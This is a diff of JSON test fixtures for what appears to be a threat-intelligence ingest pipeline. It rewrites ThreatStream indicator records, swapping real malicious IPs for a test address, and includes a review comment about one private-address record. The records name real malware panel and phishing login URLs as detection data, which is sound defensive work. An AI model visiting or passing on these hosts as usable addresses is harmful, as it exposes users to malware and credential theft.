- "ingested": "2021-12-13T05:57:34.385442064Z",
+ "ingested": "2021-12-13T08:38:40.023058200Z",
 "original": "{\"created\":\"2020-01-25T02:57:38.187Z\",\"description\":\"TS ID: 55253484356; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--da030e10-af9f-462d-bda8-33abb223e950\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T02:57:38.187Z\",\"name\":\"mal_url: http://officelog.org/inc/js/jstree/scan/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://officelog.org/inc/js/jstree/scan/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:38.187Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -4283,7 +4283,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385446432Z",
+ "ingested": "2021-12-13T08:38:40.023062200Z",
 "original": "{\"created\":\"2020-01-25T02:57:38.214Z\",\"description\":\"TS ID: 55253484343; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--d38e051a-bc5b-4723-884a-65e017d98299\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-65\"],\"modified\":\"2020-01-25T02:57:38.214Z\",\"name\":\"mal_url: http://f0391587.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391587.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:38.214Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -4302,7 +4302,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_url: http://46.161.27.57:8080/northon/",
+ "name": "mal_url: http://89.160.20.156:8080/northon/",
 "description": "TS ID: 55253484367; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime",
 "modified": "2020-01-25T02:57:47.281Z",
 "valid_from": "2020-01-25T02:57:47.281Z",
@@ -4326,17 +4326,17 @@
 "provider": "CyberCrime",
 "url": {
 "path": "/northon/",
- "original": "http://46.161.27.57:8080/northon/",
+ "original": "http://89.160.20.156:8080/northon/",
 "scheme": "http",
 "port": 8080,
- "domain": "46.161.27.57",
- "full": "http://46.161.27.57:8080/northon/"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:8080/northon/"
 }
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385450790Z",
- "original": "{\"created\":\"2020-01-25T02:57:47.281Z\",\"description\":\"TS ID: 55253484367; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime\",\"id\":\"indicator--46491826-6ba1-4217-a35e-1eb0081a9e6a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-25T02:57:47.281Z\",\"name\":\"mal_url: http://46.161.27.57:8080/northon/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://46.161.27.57:8080/northon/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:47.281Z\"}",
+ "ingested": "2021-12-13T08:38:40.023067600Z",
+ "original": "{\"created\":\"2020-01-25T02:57:47.281Z\",\"description\":\"TS ID: 55253484367; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime\",\"id\":\"indicator--46491826-6ba1-4217-a35e-1eb0081a9e6a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-25T02:57:47.281Z\",\"name\":\"mal_url: http://89.160.20.156:8080/northon/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156:8080/northon/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:47.281Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -4386,7 +4386,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385455619Z",
+ "ingested": "2021-12-13T08:38:40.023075200Z",
 "original": "{\"created\":\"2020-01-25T02:57:51.296Z\",\"description\":\"TS ID: 55253484342; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--b9715fd5-b89a-4859-b19f-55e052709227\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-01-25T02:57:51.296Z\",\"name\":\"mal_url: http://f0393086.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0393086.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:51.296Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -4438,7 +4438,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385460288Z",
+ "ingested": "2021-12-13T08:38:40.023079200Z",
 "original": "{\"created\":\"2020-01-25T02:57:56.007Z\",\"description\":\"TS ID: 55253484363; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--e3177515-f481-46c8-bad8-582ba0858ef3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-25T02:57:56.007Z\",\"name\":\"mal_url: http://insuncos.com/files1/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://insuncos.com/files1/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:56.007Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -4489,7 +4489,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385464566Z",
+ "ingested": "2021-12-13T08:38:40.023085300Z",
 "original": "{\"created\":\"2020-01-25T02:57:56.044Z\",\"description\":\"TS ID: 55253484339; iType: mal_url; State: active; Org: DDoS-GUARD GmbH; Source: CyberCrime\",\"id\":\"indicator--33cdeaeb-5201-4fbb-b9ae-9c23377e7533\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T02:57:56.044Z\",\"name\":\"mal_url: http://tg-h.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tg-h.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:56.044Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -4541,7 +4541,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385468975Z",
+ "ingested": "2021-12-13T08:38:40.023090500Z",
 "original": "{\"created\":\"2020-01-25T02:58:11.038Z\",\"description\":\"TS ID: 55253484351; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--2baaa5f0-c2f6-4bd1-b59d-3a75931da735\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-25T02:58:11.038Z\",\"name\":\"mal_url: http://wusetwo.xyz/public_html/file/five/inc/class/pCharts/info/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://wusetwo.xyz/public_html/file/five/inc/class/pCharts/info/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:11.038Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -4560,7 +4560,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_url: http://185.234.217.36/northon/",
+ "name": "mal_url: http://89.160.20.156/northon/",
 "description": "TS ID: 55253484366; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime",
 "modified": "2020-01-25T02:58:20.420Z",
 "valid_from": "2020-01-25T02:58:20.42Z",
@@ -4584,16 +4584,16 @@
 "provider": "CyberCrime",
 "url": {
 "path": "/northon/",
- "original": "http://185.234.217.36/northon/",
+ "original": "http://89.160.20.156/northon/",
 "scheme": "http",
- "domain": "185.234.217.36",
- "full": "http://185.234.217.36/northon/"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156/northon/"
 }
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385473443Z",
- "original": "{\"created\":\"2020-01-25T02:58:20.42Z\",\"description\":\"TS ID: 55253484366; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime\",\"id\":\"indicator--f1bdef49-666f-46b5-a323-efa1f1446b62\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-64\"],\"modified\":\"2020-01-25T02:58:20.42Z\",\"name\":\"mal_url: http://185.234.217.36/northon/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://185.234.217.36/northon/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:20.42Z\"}",
+ "ingested": "2021-12-13T08:38:40.023095100Z",
+ "original": "{\"created\":\"2020-01-25T02:58:20.42Z\",\"description\":\"TS ID: 55253484366; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime\",\"id\":\"indicator--f1bdef49-666f-46b5-a323-efa1f1446b62\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-64\"],\"modified\":\"2020-01-25T02:58:20.42Z\",\"name\":\"mal_url: http://89.160.20.156/northon/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/northon/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:20.42Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -4644,7 +4644,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385477661Z",
+ "ingested": "2021-12-13T08:38:40.023100500Z",
 "original": "{\"created\":\"2020-01-25T02:58:20.448Z\",\"description\":\"TS ID: 55253484354; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--a173f4b1-67ce-44f8-a6d0-bd8a24e8c593\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-25T02:58:20.448Z\",\"name\":\"mal_url: http://topik07.mcdir.ru/papka/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://topik07.mcdir.ru/papka/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:20.448Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -4696,7 +4696,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385481979Z",
+ "ingested": "2021-12-13T08:38:40.023105800Z",
 "original": "{\"created\":\"2020-01-25T02:58:33.189Z\",\"description\":\"TS ID: 55253484362; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--b53dded1-d293-4cd1-9e63-b6e0cbd850f0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-25T02:58:33.189Z\",\"name\":\"mal_url: http://insuncos.com/files2/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://insuncos.com/files2/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:33.189Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -4715,7 +4715,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_url: http://185.234.218.68/kaspersky/",
+ "name": "mal_url: http://89.160.20.156/kaspersky/",
 "description": "TS ID: 55253484364; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime",
 "modified": "2020-01-25T02:58:49.056Z",
 "valid_from": "2020-01-25T02:58:49.056Z",
@@ -4739,16 +4739,16 @@
 "provider": "CyberCrime",
 "url": {
 "path": "/kaspersky/",
- "original": "http://185.234.218.68/kaspersky/",
+ "original": "http://89.160.20.156/kaspersky/",
 "scheme": "http",
- "domain": "185.234.218.68",
- "full": "http://185.234.218.68/kaspersky/"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156/kaspersky/"
 }
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385486187Z",
- "original": "{\"created\":\"2020-01-25T02:58:49.056Z\",\"description\":\"TS ID: 55253484364; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime\",\"id\":\"indicator--2b30f8fe-13e8-4a7d-8eba-3e59c288bef7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-01-25T02:58:49.056Z\",\"name\":\"mal_url: http://185.234.218.68/kaspersky/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://185.234.218.68/kaspersky/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:49.056Z\"}",
+ "ingested": "2021-12-13T08:38:40.023110400Z",
+ "original": "{\"created\":\"2020-01-25T02:58:49.056Z\",\"description\":\"TS ID: 55253484364; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime\",\"id\":\"indicator--2b30f8fe-13e8-4a7d-8eba-3e59c288bef7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-01-25T02:58:49.056Z\",\"name\":\"mal_url: http://89.160.20.156/kaspersky/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/kaspersky/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:49.056Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -4799,7 +4799,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385490555Z",
+ "ingested": "2021-12-13T08:38:40.023116100Z",
 "original": "{\"created\":\"2020-01-25T02:58:59.472Z\",\"description\":\"TS ID: 55253484357; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--f502199a-17a4-404b-a114-fb5eda28c32c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T02:58:59.472Z\",\"name\":\"mal_url: http://officelog.org/inc/js/jstree/mh/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://officelog.org/inc/js/jstree/mh/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:59.472Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -4851,7 +4851,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385494673Z",
+ "ingested": "2021-12-13T08:38:40.023123700Z",
 "original": "{\"created\":\"2020-01-25T02:59:27.07Z\",\"description\":\"TS ID: 55253484359; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--af7422eb-5d8e-4878-bdd1-395313434dae\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T02:59:27.07Z\",\"name\":\"mal_url: http://officelog.org/inc/js/jstree/ch/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://officelog.org/inc/js/jstree/ch/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:27.07Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -4903,7 +4903,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385499442Z",
+ "ingested": "2021-12-13T08:38:40.023131300Z",
 "original": "{\"created\":\"2020-01-25T02:59:28.967Z\",\"description\":\"TS ID: 55253484358; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--71b36c05-86dd-4685-81c0-5a99e2e14c23\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T02:59:28.967Z\",\"name\":\"mal_url: http://officelog.org/inc/js/jstree/dar/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://officelog.org/inc/js/jstree/dar/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:28.967Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -4955,7 +4955,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385503589Z",
+ "ingested": "2021-12-13T08:38:40.023136900Z",
 "original": "{\"created\":\"2020-01-25T02:59:37.661Z\",\"description\":\"TS ID: 55253484352; iType: mal_url; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--9d948509-dfb4-45b6-b8bc-780df88a213f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-25T02:59:37.661Z\",\"name\":\"mal_url: http://oaa-my.com/cage/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://oaa-my.com/cage/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:37.661Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -4974,7 +4974,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_ip: 192.64.118.56",
+ "name": "mal_ip: 192.168.118.56",
 "description": "TS ID: 55253484224; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime",
 "modified": "2020-01-25T02:59:37.692Z",
 "valid_from": "2020-01-25T02:59:37.692Z",
@@ -4996,12 +4996,12 @@
 "first_seen": "2020-01-25T02:59:37.692Z",
 "type": "ipv4-addr",
 "provider": "CyberCrime",
- "ip": "192.64.118.56"
+ "ip": "192.168.118.56"
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385508268Z",
- "original": "{\"created\":\"2020-01-25T02:59:37.692Z\",\"description\":\"TS ID: 55253484224; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--9f613f8e-2040-4eee-8044-044023a8093e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-01-25T02:59:37.692Z\",\"name\":\"mal_ip: 192.64.118.56\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '192.64.118.56']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:37.692Z\"}",
+ "ingested": "2021-12-13T08:38:40.023140500Z",
+ "original": "{\"created\":\"2020-01-25T02:59:37.692Z\",\"description\":\"TS ID: 55253484224; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--9f613f8e-2040-4eee-8044-044023a8093e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-01-25T02:59:37.692Z\",\"name\":\"mal_ip: 192.168.118.56\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '192.168.118.56']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:37.692Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
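Review bot: The `mal_ip` record at 4974/4996 is rewritten to `192.168.118.56`, an RFC 1918 private address, while every other indicator in this change is rewritten to the public `89.160.20.156`; given the stated intent of moving fixtures onto the supported public test subset, this one looks like an inconsistent choice rather than a deliberate one. A private source value plausibly takes a different enrichment path in the pipeline than a public one (the structured output here shows only `threat.indicator.ip`, so this is inferred, not visible), which means the fixture's coverage changes and not just its data. Either use the same supported public address as the other records, or add a line to the package's test README noting why this record is intentionally private. The `name`, `threat.indicator.ip` and the `pattern` inside `event.original` are kept in step with each other in this hunk, which is the right way to change it.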
@@ -5052,7 +5052,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385513198Z",
+ "ingested": "2021-12-13T08:38:40.023144500Z",
 "original": "{\"created\":\"2020-01-25T02:59:54.296Z\",\"description\":\"TS ID: 55253484361; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--518c3959-6c26-413f-9a5f-c8f76d86185a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-25T02:59:54.296Z\",\"name\":\"mal_url: http://insuncos.com/files3/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://insuncos.com/files3/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:54.296Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -5103,7 +5103,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385517516Z",
+ "ingested": "2021-12-13T08:38:40.023149600Z",
 "original": "{\"created\":\"2020-01-25T02:59:57.748Z\",\"description\":\"TS ID: 55253484347; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--625b94ec-2304-4502-a2eb-59d52cdb9c1f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-01-25T02:59:57.748Z\",\"name\":\"mal_url: http://t95212tt.beget.tech/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://t95212tt.beget.tech/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:57.748Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -5154,7 +5154,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385522124Z",
+ "ingested": "2021-12-13T08:38:40.023155200Z",
 "original": "{\"created\":\"2020-01-25T03:00:22.168Z\",\"description\":\"TS ID: 55253484349; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--c8f76b97-051f-4fab-b57f-a57f37480aa0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-25T03:00:22.168Z\",\"name\":\"mal_url: http://kiototan.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://kiototan.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T03:00:22.168Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -5173,7 +5173,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_ip: 176.107.160.43",
+ "name": "mal_ip: 89.160.20.156",
 "description": "TS ID: 55253484353; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime",
 "modified": "2020-01-25T03:00:27.279Z",
 "valid_from": "2020-01-25T03:00:27.279Z",
@@ -5195,12 +5195,12 @@
 "first_seen": "2020-01-25T03:00:27.279Z",
 "type": "ipv4-addr",
 "provider": "CyberCrime",
- "ip": "176.107.160.43"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385526613Z",
- "original": "{\"created\":\"2020-01-25T03:00:27.279Z\",\"description\":\"TS ID: 55253484353; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime\",\"id\":\"indicator--7abc3f41-e952-481f-8bf7-7b52af05451f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-01-25T03:00:27.279Z\",\"name\":\"mal_ip: 176.107.160.43\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '176.107.160.43']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T03:00:27.279Z\"}",
+ "ingested": "2021-12-13T08:38:40.023159400Z",
+ "original": "{\"created\":\"2020-01-25T03:00:27.279Z\",\"description\":\"TS ID: 55253484353; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime\",\"id\":\"indicator--7abc3f41-e952-481f-8bf7-7b52af05451f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-01-25T03:00:27.279Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T03:00:27.279Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -5250,7 +5250,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385531111Z",
+ "ingested": "2021-12-13T08:38:40.023165800Z",
 "original": "{\"created\":\"2020-01-25T03:00:29.248Z\",\"description\":\"TS ID: 55253484340; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--72334129-8d1c-4cac-bde6-2d5d6316e266\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-25T03:00:29.248Z\",\"name\":\"mal_url: http://newfoundfriend.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://newfoundfriend.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T03:00:29.248Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -5302,7 +5302,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385535840Z",
+ "ingested": "2021-12-13T08:38:40.023170Z",
 "original": "{\"created\":\"2020-01-25T03:01:03.628Z\",\"description\":\"TS ID: 55253484360; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--a3f8f1e3-77c5-442d-a918-5d3d800a8357\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T03:01:03.628Z\",\"name\":\"mal_url: http://officelog.org/inc/js/jstree/bi/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://officelog.org/inc/js/jstree/bi/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T03:01:03.628Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -5354,7 +5354,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385540629Z",
+ "ingested": "2021-12-13T08:38:40.023174400Z",
 "original": "{\"created\":\"2020-01-25T03:01:03.65Z\",\"description\":\"TS ID: 55253484355; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--49bac194-cefe-4c31-81eb-cc81a3a3bb26\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T03:01:03.65Z\",\"name\":\"mal_url: http://officelog.org/inc/js/jstree/vic/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://officelog.org/inc/js/jstree/vic/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T03:01:03.65Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -5373,7 +5373,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_url: http://45.139.236.48/login",
+ "name": "mal_url: http://89.160.20.156/login",
 "description": "TS ID: 55256890160; iType: mal_url; State: active; Source: CyberCrime",
 "modified": "2020-01-26T02:54:41.651Z",
 "valid_from": "2020-01-26T02:54:41.651Z",
@@ -5397,16 +5397,16 @@
 "provider": "CyberCrime",
 "url": {
 "path": "/login",
- "original": "http://45.139.236.48/login",
+ "original": "http://89.160.20.156/login",
 "scheme": "http",
- "domain": "45.139.236.48",
- "full": "http://45.139.236.48/login"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156/login"
 }
 }
 },
 "event": {
